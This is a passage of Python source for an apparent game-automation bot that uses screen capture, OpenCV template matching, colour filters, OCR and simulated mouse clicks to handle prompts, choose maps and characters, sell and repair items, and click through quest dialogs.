with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [516, 426, 541, 441])
image = wincap.get_screenshot()
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=Yes'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if result == "Yes":
return True
wincap = WindowCapture(gamename, [748, 426, 775, 441])
image = wincap.get_screenshot()
cv2.imwrite("testytest.jpg", image)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=No'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
if result == "No":
return True
return False
def detect_resurrect_prompt(gamename):
wincap = WindowCapture(gamename, [763, 490, 818, 492])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a + d > 500:
if b + e > 500:
if c + f > 500:
return True
return False
def detect_store(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [1084, 265, 1099, 267])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
g, h, i = [int(i) for i in image[0][4]]
        if a + b + c + d + e + f > 1500:
            # A value of 7 here means the shop is disabled; 8 means it is active
            if g == 8:
                return True
return False
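# Each detect_* probe above follows the same recipe: capture a tiny strip with
# WindowCapture, take two pixels from it, and compare their BGR channels
# against thresholds calibrated for this UI layout. A hedged sketch of that
# pattern as a generic helper (hypothetical; not called by the bot itself):
def _pixel_probe(gamename, rect, check):
    """Return True when `check(first_pixel, last_pixel)` passes for the captured strip."""
    wincap = WindowCapture(gamename, rect)
    image = wincap.get_screenshot()
    first = [int(v) for v in image[0][0]]
    last = [int(v) for v in image[0][-1]]
    return bool(check(first, last))
# For example, Events.detect_go could be expressed as:
# _pixel_probe(gamename, [623, 247, 628, 249],
#              lambda p, q: p[0] < 30 and p[1] > 240 and p[2] > 140)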
class RHClick:
def click_yes(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+528, wincap.window_rect[1]+433)
def click_no(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+763, wincap.window_rect[1]+433)
def click_otherworld_ok(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+503, wincap.window_rect[1]+487)
def click_otherworld_no(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+778, wincap.window_rect[1]+487)
def click_choose_map(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+1150, wincap.window_rect[1]+210)
def click_explore_again(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+1150, wincap.window_rect[1]+152)
def click_back_to_town(gamename):
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+1150, wincap.window_rect[1]+328)
def click_map_number(gamename, mapnum):
wincap = WindowCapture(gamename)
map_to_clickpoints = {
5: (728, 521),
6: (640, 631),
7: (605, 455),
8: (542, 350),
9: (293, 297),
10: (777, 406),
11: (140, 370),
12: (500, 246),
13: (500, 672),
14: (419, 478),
15: (423, 263),
16: (563, 562),
17: (642, 432),
18: (249, 325)
}
x, y = map_to_clickpoints[mapnum]
pydirectinput.click(wincap.window_rect[0]+x, wincap.window_rect[1]+y)
def choose_difficulty_and_enter(gamename, diff):
wincap = WindowCapture(gamename)
num_clicks = 0
if diff == "N":
num_clicks = 0
elif diff == "H":
num_clicks = 1
        elif diff == "VH":
            num_clicks = 2
        elif diff == "BM":
            num_clicks = 3
for i in range(num_clicks):
pydirectinput.click(
wincap.window_rect[0]+618, wincap.window_rect[1]+333)
time.sleep(0.3)
# Then click on enter dungeon
pydirectinput.click(
wincap.window_rect[0]+1033, wincap.window_rect[1]+736)
def go_to_change_character(gamename):
if not BotUtils.detect_menu_open(gamename):
pydirectinput.press('esc')
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+363)
def exit_game(gamename):
if not BotUtils.detect_menu_open(gamename):
pydirectinput.press('esc')
wincap = WindowCapture(gamename)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+480)
time.sleep(0.2)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+428)
def choose_character(gamename, charnum):
wincap = WindowCapture(gamename)
char_clickpoints = {
1: (1100, 140),
2: (1100, 210),
3: (1100, 280),
4: (1100, 350),
5: (1100, 420),
6: (1100, 490),
7: (1100, 560),
8: (1100, 630)
}
if charnum > 8:
pydirectinput.click(
wincap.window_rect[0]+1165, wincap.window_rect[1]+680)
x, y = char_clickpoints[charnum-8]
else:
pydirectinput.click(
wincap.window_rect[0]+1035, wincap.window_rect[1]+680)
x, y = char_clickpoints[charnum]
time.sleep(0.2)
pydirectinput.click(wincap.window_rect[0]+x, wincap.window_rect[1]+y)
time.sleep(0.2)
pydirectinput.click(
wincap.window_rect[0]+640, wincap.window_rect[1]+765)
class Vision:
def __init__(self, needle_img_path, method=cv2.TM_CCOEFF_NORMED):
self.needle_img = cv2.imread(needle_img_path, cv2.IMREAD_UNCHANGED)
self.needle_w = self.needle_img.shape[1]
self.needle_h = self.needle_img.shape[0]
# TM_CCOEFF, TM_CCOEFF_NORMED, TM_CCORR, TM_CCORR_NORMED, TM_SQDIFF, TM_SQDIFF_NORMED
self.method = method
def find(self, haystack_img, threshold=0.7, max_results=15, epsilon=0.5):
result = cv2.matchTemplate(haystack_img, self.needle_img, self.method)
locations = np.where(result >= threshold)
locations = list(zip(*locations[::-1]))
if not locations:
return np.array([], dtype=np.int32).reshape(0, 4)
rectangles = []
for loc in locations:
            rect = [int(loc[0]), int(loc[1]), self.needle_w, self.needle_h]
            # Add each box twice so groupRectangles keeps single, non-overlapping boxes
            rectangles.append(rect)
            rectangles.append(rect)
        rectangles, weights = cv2.groupRectangles(
            rectangles, groupThreshold=1, eps=epsilon)
        if len(rectangles) > max_results:
            rectangles = rectangles[:max_results]
        return rectangles
def get_click_points(self, rectangles):
points = []
for (x, y, w, h) in rectangles:
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def draw_rectangles(self, haystack_img, rectangles):
# BGR
line_color = (0, 255, 0)
line_type = cv2.LINE_4
for (x, y, w, h) in rectangles:
top_left = (x, y)
bottom_right = (x + w, y + h)
cv2.rectangle(haystack_img, top_left, bottom_right,
line_color, lineType=line_type)
return haystack_img
    def draw_crosshairs(self, haystack_img, points):
        # BGR
        marker_color = (255, 0, 255)
        marker_type = cv2.MARKER_CROSS
        for (center_x, center_y) in points:
            cv2.drawMarker(haystack_img, (center_x, center_y),
                           marker_color, marker_type)
        return haystack_img
    def apply_hsv_filter(self, original_image, hsv_filter):
        # HSV filtering in the style of DynamicFilter.apply_hsv_filter, but with
        # an explicit HsvFilter required (Vision has no trackbar GUI to fall back on);
        # QuestHandle below calls this with its preset text filters
        hsv = cv2.cvtColor(original_image, cv2.COLOR_BGR2HSV)
        h, s, v = cv2.split(hsv)
        s = BotUtils.shift_channel(s, hsv_filter.sAdd)
        s = BotUtils.shift_channel(s, -hsv_filter.sSub)
        v = BotUtils.shift_channel(v, hsv_filter.vAdd)
        v = BotUtils.shift_channel(v, -hsv_filter.vSub)
        hsv = cv2.merge([h, s, v])
        lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
        upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
        mask = cv2.inRange(hsv, lower, upper)
        result = cv2.bitwise_and(hsv, hsv, mask=mask)
        return cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
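# A minimal usage sketch for Vision-based template matching (illustrative; the
# needle path reuses the prompt template referenced elsewhere in this file, and
# grabbing the haystack via WindowCapture is an assumption, not a fixed API):
def _demo_vision(gamename, needle_path='xprompt67filtv2.jpg'):
    vision = Vision(needle_path)
    haystack = WindowCapture(gamename).get_screenshot()
    rectangles = vision.find(haystack, threshold=0.7)
    points = vision.get_click_points(rectangles)
    annotated = vision.draw_crosshairs(
        vision.draw_rectangles(haystack, rectangles), points)
    return points, annotated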
class DynamicFilter:
TRACKBAR_WINDOW = "Trackbars"
# create gui window with controls for adjusting arguments in real-time
def __init__(self, needle_img_path, method=cv2.TM_CCOEFF_NORMED):
self.needle_img = cv2.imread(needle_img_path, cv2.IMREAD_UNCHANGED)
self.needle_w = self.needle_img.shape[1]
self.needle_h = self.needle_img.shape[0]
# TM_CCOEFF, TM_CCOEFF_NORMED, TM_CCORR, TM_CCORR_NORMED, TM_SQDIFF, TM_SQDIFF_NORMED
self.method = method
def find(self, haystack_img, threshold=0.7, epsilon=0.5):
result = cv2.matchTemplate(haystack_img, self.needle_img, self.method)
locations = np.where(result >= threshold)
locations = list(zip(*locations[::-1]))
if not locations:
return np.array([], dtype=np.int32).reshape(0, 4)
rectangles = []
for loc in locations:
rect = [int(loc[0]), int(loc[1]), self.needle_w, self.needle_h]
rectangles.append(rect)
rectangles.append(rect)
rectangles, weights = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=epsilon)
return rectangles
def get_click_points(self, rectangles):
points = []
for (x, y, w, h) in rectangles:
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def draw_rectangles(self, haystack_img, rectangles):
# BGR
line_color = (0, 255, 0)
line_type = cv2.LINE_4
for (x, y, w, h) in rectangles:
top_left = (x, y)
bottom_right = (x + w, y + h)
cv2.rectangle(haystack_img, top_left, bottom_right,
line_color, lineType=line_type)
return haystack_img
def draw_crosshairs(self, haystack_img, points):
# BGR
marker_color = (255, 0, 255)
marker_type = cv2.MARKER_CROSS
for (center_x, center_y) in points:
cv2.drawMarker(haystack_img, (center_x, center_y),
marker_color, marker_type)
return haystack_img
def init_control_gui(self):
cv2.namedWindow(self.TRACKBAR_WINDOW, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self.TRACKBAR_WINDOW, 350, 700)
# required callback. we'll be using getTrackbarPos() to do lookups
# instead of using the callback.
def nothing(position):
pass
# create trackbars for bracketing.
# OpenCV scale for HSV is H: 0-179, S: 0-255, V: 0-255
cv2.createTrackbar('HMin', self.TRACKBAR_WINDOW, 0, 179, nothing)
cv2.createTrackbar('SMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('HMax', self.TRACKBAR_WINDOW, 0, 179, nothing)
cv2.createTrackbar('SMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
# Set default value for Max HSV trackbars
cv2.setTrackbarPos('HMax', self.TRACKBAR_WINDOW, 179)
cv2.setTrackbarPos('SMax', self.TRACKBAR_WINDOW, 255)
cv2.setTrackbarPos('VMax', self.TRACKBAR_WINDOW, 255)
# trackbars for increasing/decreasing saturation and value
cv2.createTrackbar('SAdd', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('SSub', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VAdd', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('VSub', self.TRACKBAR_WINDOW, 0, 255, nothing)
# returns an HSV filter object based on the control GUI values
def get_hsv_filter_from_controls(self):
# Get current positions of all trackbars
hsv_filter = HsvFilter()
hsv_filter.hMin = cv2.getTrackbarPos('HMin', self.TRACKBAR_WINDOW)
hsv_filter.sMin = cv2.getTrackbarPos('SMin', self.TRACKBAR_WINDOW)
hsv_filter.vMin = cv2.getTrackbarPos('VMin', self.TRACKBAR_WINDOW)
hsv_filter.hMax = cv2.getTrackbarPos('HMax', self.TRACKBAR_WINDOW)
hsv_filter.sMax = cv2.getTrackbarPos('SMax', self.TRACKBAR_WINDOW)
hsv_filter.vMax = cv2.getTrackbarPos('VMax', self.TRACKBAR_WINDOW)
hsv_filter.sAdd = cv2.getTrackbarPos('SAdd', self.TRACKBAR_WINDOW)
hsv_filter.sSub = cv2.getTrackbarPos('SSub', self.TRACKBAR_WINDOW)
hsv_filter.vAdd = cv2.getTrackbarPos('VAdd', self.TRACKBAR_WINDOW)
hsv_filter.vSub = cv2.getTrackbarPos('VSub', self.TRACKBAR_WINDOW)
return hsv_filter
def apply_hsv_filter(self, original_image, hsv_filter=None):
hsv = cv2.cvtColor(original_image, cv2.COLOR_BGR2HSV)
if not hsv_filter:
hsv_filter = self.get_hsv_filter_from_controls()
h, s, v = cv2.split(hsv)
s = BotUtils.shift_channel(s, hsv_filter.sAdd)
s = BotUtils.shift_channel(s, -hsv_filter.sSub)
v = BotUtils.shift_channel(v, hsv_filter.vAdd)
v = BotUtils.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
return img
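# A hedged sketch of how DynamicFilter's trackbar GUI is intended to be driven:
# create the control window once, then re-read the sliders every frame and
# apply the resulting HSV filter to a live capture. The window name, needle
# path and quit key are illustrative choices, not fixed by this module:
def _demo_hsv_tuning(gamename):
    tuner = DynamicFilter('xprompt67filtv2.jpg')
    tuner.init_control_gui()
    wincap = WindowCapture(gamename)
    while True:
        frame = wincap.get_screenshot()
        # With no explicit filter, the current trackbar positions are used
        filtered = tuner.apply_hsv_filter(frame)
        cv2.imshow('hsv tuning', filtered)
        if cv2.waitKey(1) == ord('q'):
            break
    cv2.destroyAllWindows()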
class RgbFilter:
def __init__(self, rMin=None, gMin=None, bMin=None, rMax=None, gMax=None, bMax=None):
self.rMin = rMin
self.gMin = gMin
self.bMin = bMin
self.rMax = rMax
self.gMax = gMax
self.bMax = bMax
class VisionRGB:
TRACKBAR_WINDOW = "Trackbars"
needle_img = None
needle_w = 0
needle_h = 0
method = None
def __init__(self, needle_img_path, method=cv2.TM_CCOEFF_NORMED) -> None:
self.needle_img = cv2.imread(needle_img_path, cv2.IMREAD_UNCHANGED)
# Save the dimensions of the needle image
self.needle_w = self.needle_img.shape[1]
self.needle_h = self.needle_img.shape[0]
# TM_CCOEFF, TM_CCOEFF_NORMED, TM_CCORR, TM_CCORR_NORMED, TM_SQDIFF, TM_SQDIFF_NORMED
self.method = method
def find(self, haystack_img, threshold=0.7, max_results=15, epsilon=0.5):
# run the OpenCV algorithm
result = cv2.matchTemplate(haystack_img, self.needle_img, self.method)
# Grab results above threshold
locations = np.where(result >= threshold)
locations = list(zip(*locations[::-1]))
# if we found no results
if not locations:
return np.array([], dtype=np.int32).reshape(0, 4)
# First we need to create the list of [x, y, w, h] rectangles
rectangles = []
for loc in locations:
rect = [int(loc[0]), int(loc[1]), self.needle_w, self.needle_h]
# Add every box to the list twice in order to retain single (non-overlapping) boxes
rectangles.append(rect)
rectangles.append(rect)
# Apply group rectangles.
rectangles, _ = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=epsilon)
if len(rectangles) > max_results:
rectangles = rectangles[:max_results]
return rectangles
# create gui window with controls for adjusting arguments in real-time
def init_control_gui(self):
cv2.namedWindow(self.TRACKBAR_WINDOW, cv2.WINDOW_NORMAL)
cv2.resizeWindow(self.TRACKBAR_WINDOW, 350, 400)
# required callback. we'll be using getTrackbarPos() to do lookups
# instead of using the callback.
def nothing(position):
pass
# create trackbars for bracketing.
# OpenCV scale for HSV is H: 0-179, S: 0-255, V: 0-255
cv2.createTrackbar('rMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('gMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('bMin', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('rMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('gMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
cv2.createTrackbar('bMax', self.TRACKBAR_WINDOW, 0, 255, nothing)
# Set default value for Max HSV trackbars
cv2.setTrackbarPos('rMax', self.TRACKBAR_WINDOW, 255)
cv2.setTrackbarPos('gMax', self.TRACKBAR_WINDOW, 255)
cv2.setTrackbarPos('bMax', self.TRACKBAR_WINDOW, 255)
# returns an HSV filter object based on the control GUI values
def get_rgb_filter_from_controls(self):
# Get current positions of all trackbars
rgb_filter = RgbFilter()
rgb_filter.rMin = cv2.getTrackbarPos('rMin', self.TRACKBAR_WINDOW)
rgb_filter.gMin = cv2.getTrackbarPos('gMin', self.TRACKBAR_WINDOW)
rgb_filter.bMin = cv2.getTrackbarPos('bMin', self.TRACKBAR_WINDOW)
rgb_filter.rMax = cv2.getTrackbarPos('rMax', self.TRACKBAR_WINDOW)
rgb_filter.gMax = cv2.getTrackbarPos('gMax', self.TRACKBAR_WINDOW)
rgb_filter.bMax = cv2.getTrackbarPos('bMax', self.TRACKBAR_WINDOW)
return rgb_filter
def apply_rgb_filter(self, original_image, rgb_filter=None):
# if we haven't been given a defined filter, use the filter values from the GUI
if not rgb_filter:
rgb_filter = self.get_rgb_filter_from_controls()
# Then apply the filter
thresh = cv2.inRange(original_image, np.array(
[rgb_filter.bMin, rgb_filter.gMin, rgb_filter.rMin]), np.array([rgb_filter.bMax, rgb_filter.gMax, rgb_filter.rMax]))
# return thresh
combined_mask_inv = 255 - thresh
# combined_mask_inv = thresh
combined_mask_rgb = cv2.cvtColor(combined_mask_inv, cv2.COLOR_GRAY2BGR)
return cv2.max(original_image, combined_mask_rgb)
def get_click_points(self, rectangles):
points = []
# Loop over all the rectangles
for (x, y, w, h) in rectangles:
# Determine the center position
center_x = x + int(w/2)
center_y = y + int(h/2)
# Save the points
points.append((center_x, center_y))
return points
def draw_rectangles(self, haystack_img, rectangles):
# these colors are actually BGR
line_color = (0, 255, 0)
line_type = cv2.LINE_4
for (x, y, w, h) in rectangles:
# determine the box positions
top_left = (x, y)
bottom_right = (x + w, y + h)
# draw the box
cv2.rectangle(haystack_img, top_left, bottom_right,
line_color, lineType=line_type)
return haystack_img
def draw_crosshairs(self, haystack_img, points):
marker_color = (255, 0, 255)
marker_type = cv2.MARKER_CROSS
for (center_x, center_y) in points:
# draw the center point
cv2.drawMarker(haystack_img, (center_x, center_y),
marker_color, marker_type)
return haystack_img
class SellRepair():
def __init__(self, rarity_cutoff=1, last_row_protect=True) -> None:
# rarities are as follows:
# nocolour=0, green=1, blue=2
self.cutoff = rarity_cutoff
# this is for whether lastrow in equip is protected
# useful for characters levelling with next upgrades ready
self.last_row_protect = last_row_protect
with open("gamename.txt") as f:
self.gamename = f.readline()
self.inventory_wincap = WindowCapture(
self.gamename, [512, 277, 775, 430])
# This is for correct mouse positioning
self.game_wincap = WindowCapture(self.gamename)
self.shop_check_wincap = WindowCapture(
self.gamename, [274, 207, 444, 208])
# These are for holding reference rgb values
# Using sets as can then compare easily to other sets
self.empty = {41, 45, 50}
self.rar_green = {2, 204, 43}
self.rar_blue = {232, 144, 5}
self.rar_none = {24, 33, 48}
self.junk_list = self.grab_junk_list()
def grab_junk_list(self):
jl = []
with open("itemrgb.txt") as f:
lines = f.readlines()
for line in lines:
_, rgb = line.split("|")
r, g, b = rgb.split(",")
jl.append({int(r), int(g), int(b)})
return jl
def ident_sell_repair(self):
self.game_wincap.update_window_position(border=False)
self.shop_check_wincap.update_window_position(border=False)
self.open_store_if_necessary()
# First go through all the equipment
self.change_tab("Equipment")
# time.sleep(0.2)
# self.hover_mouse_all()
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_rarities_equip(non_empty, screenshot)
self.sell(junk_list, "Equipment")
# Then go through all the other loot
self.change_tab("Other")
# time.sleep(0.2)
# self.hover_mouse_all()
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_items_other(non_empty, screenshot)
self.sell(junk_list)
# and finally repair gear
self.repair()
# and now go through all the steps again minus repair to make sure
self.change_tab("Equipment")
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_rarities_equip(non_empty, screenshot)
self.sell(junk_list, "Equipment")
self.change_tab("Other")
time.sleep(0.3)
screenshot = self.inventory_wincap.get_screenshot()
non_empty = self.remove_empty(screenshot)
junk_list = self.identify_items_other(non_empty, screenshot)
self.sell(junk_list)
def open_store_if_necessary(self):
# This will search to see if the inventory is open
# in the correct spot and then click shop if not
screenshot = self.shop_check_wincap.get_screenshot()
pix1 = screenshot[0, 0]
pix1 = int(pix1[0]) + int(pix1[1]) + int(pix1[2])
pix2 = screenshot[0, 169]
pix2 = int(pix2[0]) + int(pix2[1]) + int(pix2[2])
if pix1 == 103 and pix2 == 223:
pass
else:
# need to open the store
self.game_wincap.update_window_position(border=False)
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
ctypes.windll.user32.SetCursorPos(offsetx+610, offsety-10)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
def change_tab(self, name):
self.game_wincap.update_window_position(border=False)
x = self.game_wincap.window_rect[0] + 534-60
if name == "Equipment":
y = self.game_wincap.window_rect[1] + 277 - 15
elif name == "Other":
y = self.game_wincap.window_rect[1] + 277 + 44
ctypes.windll.user32.SetCursorPos(x, y)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
def hover_mouse_all(self):
self.game_wincap.update_window_position(border=False)
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
for i in range(4):
for j in range(6):
x = offsetx+j*44
y = offsety+i*44
ctypes.windll.user32.SetCursorPos(x-10, y)
time.sleep(0.03)
ctypes.windll.user32.SetCursorPos(x, y)
time.sleep(0.03)
ctypes.windll.user32.SetCursorPos(x+10, y)
ctypes.windll.user32.SetCursorPos(offsetx, offsety-70)
# ctypes.windll.user32.SetCursorPos(offsetx+610, offsety-10)
def remove_empty(self, screenshot):
non_empty = []
for i in range(4):
for j in range(6):
colour = set(screenshot[i*44, 22+j*44])
if colour != self.empty:
non_empty.append([i, j])
# format will be as follows of return list
# x,y,r,g,b
return non_empty
def identify_rarities_equip(self, rowcol_list, screenshot):
junk = []
for rowcol in rowcol_list:
colour = set(screenshot[rowcol[0]*44, rowcol[1]*44])
if colour == self.rar_none:
junk.append([rowcol[0], rowcol[1]])
            elif colour == self.rar_green:
                if self.cutoff >= 1:
                    junk.append([rowcol[0], rowcol[1]])
            elif colour == self.rar_blue:
                if self.cutoff >= 2:
                    junk.append([rowcol[0], rowcol[1]])
# format will be as follows of return list
# x,y corresponding to row,col
return junk
def identify_items_other(self, rowcol_list, screenshot):
junk = []
for rowcol in rowcol_list:
colour = set(screenshot[rowcol[0]*44, 22+rowcol[1]*44])
if colour in self.junk_list:
junk.append([rowcol[0], rowcol[1]])
# format will be as follows of return list
# x,y corresponding to row,col
return junk
def sell(self, rowcol_list, tab="Other"):
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
for item in rowcol_list:
if tab == "Equipment":
if self.last_row_protect:
if item[0] == 3:
continue
x = offsetx+item[1]*44
y = offsety+item[0]*44
ctypes.windll.user32.SetCursorPos(x, y)
time.sleep(0.1)
ctypes.windll.user32.mouse_event(
0x0008, 0, 0, 0, 0)
time.sleep(0.01)
ctypes.windll.user32.mouse_event(
0x0010, 0, 0, 0, 0)
# Then click a second time to be sure
time.sleep(0.01)
ctypes.windll.user32.mouse_event(
0x0008, 0, 0, 0, 0)
time.sleep(0.01)
ctypes.windll.user32.mouse_event(
0x0010, 0, 0, 0, 0)
def repair(self):
self.game_wincap.update_window_position(border=False)
offsetx = self.game_wincap.window_rect[0] + 534
offsety = self.game_wincap.window_rect[1] + 277
ctypes.windll.user32.SetCursorPos(offsetx-310, offsety+325)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
ctypes.windll.user32.SetCursorPos(offsetx+0, offsety+180)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
# this is if everything is already repaired
ctypes.windll.user32.SetCursorPos(offsetx+100, offsety+180)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
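# SellRepair.grab_junk_list expects each line of itemrgb.txt to look like
# "<item name>|<r>,<g>,<b>"; the name is ignored and only the RGB triple is
# kept (as a set, so it can be compared against sampled pixels). A small
# round-trip sketch of that format (the item name and values are made up):
def _demo_junk_line(line='Rusty Dagger|24,33,48'):
    _, rgb = line.split('|')
    r, g, b = rgb.split(',')
    return {int(r), int(g), int(b)}  # -> {24, 33, 48}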
class QuestHandle():
def __init__(self) -> None:
with open("gamename.txt") as f:
gamename = f.readline()
self.game_wincap = WindowCapture(gamename)
self.white_text_filter = HsvFilter(
0, 0, 102, 45, 65, 255, 0, 0, 0, 0)
self.yellow_text_filter = HsvFilter(
16, 71, 234, 33, 202, 255, 0, 0, 0, 0)
self.blue_text_filter = HsvFilter(
83, 126, 85, 102, 255, 255, 0, 0, 0, 0)
self.all_text_filter = HsvFilter(
0, 0, 61, 78, 255, 255, 0, 255, 0, 0)
self.vision = Vision('xprompt67filtv2.jpg')
self.accept_rect = [725, 525, 925, 595]
self.accept_wincap = WindowCapture(gamename, self.accept_rect)
self.skip_rect = [730, 740, 890, 780]
self.skip_wincap = WindowCapture(gamename, self.skip_rect)
self.next_rect = [880, 740, 1040, 780]
self.next_wincap = WindowCapture(gamename, self.next_rect)
self.quest_rect = [310, 160, 1055, 650]
self.quest_wincap = WindowCapture(gamename, self.quest_rect)
self.questlist_rect = [740, 240, 1050, 580]
self.questlist_wincap = WindowCapture(gamename, self.questlist_rect)
self.complete_wincap = WindowCapture(gamename, self.next_rect)
self.xprompt_rect = [1130, 670, 1250, 720]
self.xprompt_wincap = WindowCapture(gamename, self.xprompt_rect)
def start_quest_handle(self):
start_time = time.time()
while time.time() < start_time + 2:
if self.check_for_accept():
break
def convert_and_click(self, x, y, rect):
self.game_wincap.update_window_position(border=False)
truex = int(x + self.game_wincap.window_rect[0] + rect[0])
truey = int(y + self.game_wincap.window_rect[1] + rect[1])
ctypes.windll.user32.SetCursorPos(truex, truey)
ctypes.windll.user32.mouse_event(
0x0002, 0, 0, 0, 0)
ctypes.windll.user32.mouse_event(
0x0004, 0, 0, 0, 0)
def check_for_accept(self):
image = self.accept_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Accept" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.accept_rect)
detection = True
break
if not detection:
return self.check_for_skip()
else:
return True
def check_for_skip(self):
image = self.skip_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Skip" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.skip_rect)
detection = True
break
if not detection:
return self.check_for_next()
else:
return True
def check_for_next(self):
image = self.next_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Next" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.next_rect)
detection = True
break
if not detection:
return self.check_for_quest()
else:
return True
def check_for_quest(self):
image = self.quest_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 6 --oem 3 -c tessedit_char_whitelist=Quest'
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng', config=tess_config)
detection = False
for i in range(0, len(results["text"])):
if "Quest" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.quest_rect)
detection = True
break
if not detection:
return self.check_for_questlist()
else:
return True
def check_for_questlist(self):
image = self.questlist_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.all_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "LV" in results["text"][i]:
# at this point need to grab the centre of the rect
x = results["left"][i] + (results["width"][i]/2)
